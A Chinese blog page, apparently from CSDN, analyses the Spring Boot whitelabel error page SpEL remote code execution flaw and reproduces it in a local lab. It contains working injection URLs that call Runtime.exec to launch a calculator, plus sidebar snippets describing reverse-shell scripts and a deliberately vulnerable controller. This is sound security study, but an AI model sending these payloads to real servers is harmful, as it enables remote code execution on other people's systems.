SpringBoot SpEL RCE漏洞分析

最新推荐文章于 2024-10-04 14:48:46 发布
最新推荐文章于 2024-10-04 14:48:46 发布
阅读量1.9k 收藏
点赞数
分类专栏: 代码审计 java安全 文章标签: spring boot java 安全漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53264525/article/details/121765296
版权
本文深入分析了SpringBoot SpEL远程代码执行(RCE)漏洞,详细阐述了漏洞利用条件、复现过程及漏洞成因。通过实例展示了如何通过特定的URL触发漏洞,解释了漏洞存在于模板变量解析过程中的解析逻辑,并提供了相关参考链接。
摘要由CSDN通过智能技术生成

SpringBoot SpEL RCE

前言最近一段时间学习Spring系列的漏洞,跟着Github上的资源学习

https://github.com/LandGrey/SpringBootVulExploit

环境搭建:

https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-spel-rce

用IDEA打开并配置一个Spring Boot程序即可
image-20211207102138463
访问 http://localhost:9091/ 即可看到报错页面

漏洞利用条件:

  1. SpringBoot版本1.1.0-1.1.12、1.2.0-1.2.7、1.3.0
  2. 知道一个触发SpringBoot默认页面的接口和参数

漏洞复现:

访问 http://localhost:9091/article?id=${7*7} ,页面显示回 7*7 的计算结果 49

访问 http://localhost:9091/article?id=${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x63,0x61,0x6c,0x63}))} ,弹出计算机<

最低0.47元/天 解锁文章
0x6b79
关注
专栏目录
Spring RCE远程执行漏洞(CVE-2022-22965)
tpaer的博客
10-18 2638
这个洞22年3月底被大佬发现公布,由于Spring框架的影响范围太大了。复现条件又很低,本身就是高危的RCE漏洞可以直接拿到服务器的shell,像作者说的一样确实是一个核弹漏洞
springboot-spel-rce复现
lastwinn的博客
07-04 1097
记录自己的所学以及理解。
Spring Boot 未授权访问漏洞利用
最新发布
bmaoHk的博客
10-04 1854
Spring Boot是由Pivotal团队提供的一套开源框架,可以简化spring应用的创建及部署。它提供了丰富的Spring模块化支持,可以帮助开发者更轻松快捷地构建出企业级应用。Spring Boot通过自动配置功能,降低了复杂性,同时支持基于JVM的多种开源框架,可以缩短开发时间,使开发更加简单和高效,在应用系统中占比较大。因此当某些端点存在配置不当的时候,就有可能导致一些系统信息泄露、 RCE 等安全问题。● Spring Boot 1.x版本端点在根URL下注册。
SpringBoot Actuator RCE 漏洞总结
渗透测试研究中心
03-01 3132
一、SpringBoot env 获取* 敏感信息当我们直接访问 springboot 站点时,可以看到某些 password 字段填充了*通过${name} 可以获取明文字段 2. 配置不当导致敏感信息泄露(password 打星号,而 pwd 没有打星号)参考https://mp.weixin.qq.com/s/HmGEYRcf1hSVw9Uu9XHGsA具体实现过程:例如: 我...
[WooYun-2016-226888] SpringBoot框架SpEL漏洞复现与原理详细分析
Specif1c的博客
08-16 1535
这是2016年爆出的一个洞,在 CVE 上没有找到对应编号,经过多方资料查阅最终确认是唐朝实验室在乌云上提交的该通用漏洞,缺陷编号为WooYun-2016-226888。漏洞的产生主要来自程序员没有做异常处理 (开发要养成好习惯:fist:),使用了 springboot 默认的报错页面 (Whitelabel Error Page),默认报错页面会把判断参数是否是 SpEL 表达式,如果是就进行解析,进而导致一些危险操作的发生。由于继 2016年后依旧频频出现相关框架出现 SpEL 表达式注入漏洞,具有学
Spring-boot远程代码执行系列(whitelabel error page SpEL RCE
网络安全。
06-16 4238
0x01 漏洞原理 spring boot 处理参数值出错,流程进入 org.springframework.util.PropertyPlaceholderHelper 类中 此时 URL 中的参数值会用 parseStringValue 方法进行递归解析。 其中 ${} 包围的内容都会被 org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration 类的 resolvePlaceholder 方法当作 SpEL 表达式被解
实战案例:记一次利用SpringBoot相关RCE-bug拿下某数字化平台系统
hackzkaq的博客
01-17 271
在一次众测项目中,对某大型企业的某套数字化平台系统进行测试,前端功能简单,就一个登录页面,也没有测试账号,由于给的测试时间不多,倒腾了半天没有发现有价值的漏洞,在快要结束的时候,试了几个报错,发现是Spring Boot框架的,仿佛间看到曙光,后续也顺利拿下RCE。通过本文的分享,希望能给大家获取到一些思路和帮助~~访问http://xx.xx.xx.xx/,打开就是一个某数字化平台登录页面,尝试了登录框可能存在的各类漏洞问题,如弱口令,用户名枚举,万能密码登录,登录验证绕过,任意密码重置等等,无果。
spring boot (whitelabel error page SpEL RCE) 漏洞复现
weixin_59086772的博客
09-15 2326
雨笋教育小编来分享干货了,近期审核关系,大家先看为尽,少一篇是一篇了。 利用条件: spring boot 1.1.0-1.1.12、1.2.0-1.2.7、1.3.0 至少知道一个触发 springboot 默认错误页面的接口及参数名 利用方法: 步骤一:找到一个正常传参处比如发现访问 /article?id=xxx ,页面会报状态码为 500 的错误:Whitelabel Error Page,则后续 payload 都将会在参数 id 处尝试。 步骤二:执行 SpEL 表达式输入 /arti
盘点:Spring全家桶各类历史RCE漏洞浅析,没你想的难
lt_xiaodou的博客
10-10 429
Spring mvc就是spring中的一个MVC框架,主要用来开发web应用和网络接口,但是其使用之前需要配置大量的xml文件,比较繁琐,所以出现springboot,其内置tomcat并且内置默认的XML配置信息,从而方便了用户的使用。下图就直观表现了他们之间的关系。其实都用了SpEL表达式,不过addModelBindings方法传入的参数的是上面提到的binder,是写死在xml文件中的,无法去更改,所以这里面就考虑当没配置binder的情况下走进addDefaultMapping方法的情况。
【组件攻击链】一文看懂Spring全家桶各类RCE漏洞
HBohan的博客
01-18 979
一、Spring全家桶简介 Spring发展到现在,全家桶所包含的内容非常庞大,这里主要介绍其中关键的5个部分,分别是spring framework、 springbootspring cloud、spring security、spring mvc。其中的spring framework就是大家常常提到的spring, 这是所有spring内容最基本的底层架构,其包含spring mvc、springbootspring core、IOC和AOP等等。Spring mvc就是spring中的一个.
Spring Boot Actuator 漏洞复现合集
drnrrwfs的博客
06-12 9758
Spring Boot Actuator 未授权访问漏洞在日常的测试中还是能碰到一些的,这种未授权在某些情况下是可以达到RCE的效果的,所以还有有一定价值的,下面就是对这一系列漏洞复现。基本上就是参考这篇文章的做的复现:LandGrey/SpringBootVulExploit: SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list (github.com)Spring Boot Actuator端点通过 JMX 和HTTP 公开暴露给外界访问,大多数时候我们使用基
Spring cloud function SpEL RCE批量检测脚本,反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 批量检测脚本:python Spel_RCE_POC.py url.txt 反弹shell脚本:python Spel_RCE_Bash_EXP.py url lhost lport 受影响版本:3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
SpringBoot远程代码执行(whitelabel error page SpEL RCE
qq_50854662的博客
06-27 337
Spring-boot远程代码执行系列(whitelabel error page SpEL RCE
Spring RCE 漏洞 CVE-2022-22965复现分析
m0_61506558的博客
09-19 5682
关于CVE-2022-22965漏洞的环境调试和内容,网上看了一波,感觉有些知识点内容还是必须要了解才能理解该漏洞,为此详细写了下从Spring框架结构分析,环境搭建到漏洞分析调试整体的一个过程理解,在遇到其他类型的漏洞也可以去调试运用。(一)了解Spring框架由于本文主要介绍漏洞原理流程,所以有关框架不会具体展开,会将涉及到的内容进行解释。1、
Spring Boot远程代码执行漏洞与内存马探索
ByteCodN的博客
09-23 143
这包括对用户输入进行验证和过滤,使用安全的执行命令的方法,限制系统对外部资源的访问,定期更新和修补系统漏洞,以及遵循安全的编程实践。我们展示了一个简单的示例来说明RCE漏洞如何在Spring Boot应用程序中被滥用,并介绍了内存马的概念和工作原理。内存马的工作原理是通过将恶意代码加载到受攻击系统的内存中,然后在内存中执行该代码。通过提高对这些安全问题的认识,并采取相应的防护措施,我们可以降低Spring Boot应用程序受到RCE漏洞和内存马攻击的风险,从而保护系统的安全性。的方法来执行该代码。
SpringBoot历史漏洞复现_springboot漏洞,2024年最新真的醉了
m0_62289824的博客
04-15 2733
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~(img-yTSj4IpJ-1713175561720)]//转化的格式base。//反弹shell脚本。
(2022年12月最新)SpringBoot远程代码执行whitelabel error page SpEL RCE漏洞复现
qq1140037586的博客
12-20 2840
spring boot 处理参数值出错,流程进入org.springframework.util.PropertyPlaceholderHelper 类中 此时 URL 中的参数值会用 parseStringValue 方法进行递归解析。其中 ${} 包围的内容都会被org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration 类的 resolvePlaceholder 方法当作 SpEL 表达式被解析执行,造成 RCE 漏洞
Spring Cloud(SPEL)中发现RCE 0-day漏洞
执着
03-30 270
最近,Spring云函数官方测试用例暴露了Spring云函数SPEL表达式注入漏洞,该漏洞可以通过注入SPEL表达式来触发远程命令执行。经过分析主要的春云函数的分支(提交dc5128b),一位研究人员发现开发人员添加了简单评估上下文 .使用 IsViaHead可变量作为标志,解析前判断的值春天。云。功能。路由表达式 从HTTP头获取 .这个春天。云。功能。路由表达式参数存在于访问Spring Cloud函数的HTTP请求头中,其SpEL表达式可以通过StandardEvaluationContext注入并执
Spring-Core RCE反序列化漏洞原理与复现
FisrtBqy的博客
05-15 2326
Spring-Beans RCE反序列化漏洞原理与复现
SpringBoot SpEL表达式注入漏洞-分析与复现
06-02
SpringBoot SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码,从而导致应用被攻击。下面我将对该漏洞进行分析与复现。 一、漏洞分析 SpringBoot中的SpELSpring Expression Language)是一种基于表达式的语言,用于在运行时动态地计算值或执行逻辑。SpEL表达式可以用于访问对象的属性、调用对象的方法、进行条件判断等操作。在SpringBoot中,SpEL表达式可以用于注解中的属性值、配置文件中的属性值等场景。 在SpEL表达式中,可以使用一些特殊的语法来引用Bean对象或调用Bean对象的方法。例如,可以使用`#{beanName.methodName()}`的语法来调用Bean对象的方法。如果在SpEL表达式中使用了未经过滤的用户输入,就会存在SpEL表达式注入漏洞。 攻击者可以通过构造恶意的SpEL表达式,将其注入到应用中,从而执行恶意代码。例如,可以将`#{T(java.lang.Runtime).getRuntime().exec('calc')}`注入到应用中,从而在受害者机器上执行计算器程序。 二、漏洞复现 下面我将通过一个简单的漏洞复现来说明SpEL表达式注入漏洞的危害性。 1. 创建一个SpringBoot应用 首先,我们需要创建一个SpringBoot应用。可以使用Spring Initializr来快速创建一个基本的SpringBoot应用。 2. 添加注解 在创建好的SpringBoot应用中,我们可以添加一个Controller类,并在其中添加一个RequestMapping注解。在RequestMapping注解中,我们可以使用SpEL表达式来引用Bean对象或调用Bean对象的方法。 ```java @RestController public class MyController { @RequestMapping("/test") public String test() { return "hello world"; } @RequestMapping(value = "/{name}", method = RequestMethod.GET) public String sayHello(@PathVariable("name") String name) { return "Hello " + name + "!"; } @RequestMapping(value = "/spel", method = RequestMethod.GET) public String spel() { String expression = "#{T(java.lang.Runtime).getRuntime().exec('calc')}"; ExpressionParser parser = new SpelExpressionParser(); Expression exp = parser.parseExpression(expression); return exp.getValue().toString(); } } ``` 在上述代码中,我们在/spel接口中使用了SpEL表达式来调用Runtime.getRuntime().exec方法,从而执行计算器程序。 3. 启动应用 启动应用后,访问/spel接口,可以看到计算器程序被成功执行。 4. 防范措施 为了防范SpEL表达式注入漏洞,我们可以采取以下措施: 1. 对用户输入进行过滤和验证,避免未经过滤的用户输入被注入到SpEL表达式中。 2. 尽量避免在注解或配置文件中使用SpEL表达式。 3. 对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。 4. 在应用中禁用动态表达式功能,避免SpEL表达式被执行。 5. 总结 SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码。为了防范该漏洞,我们需要对用户输入进行过滤和验证,避免未经过滤的用户输入被注入到SpEL表达式中。同时,尽量避免在注解或配置文件中使用SpEL表达式,对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值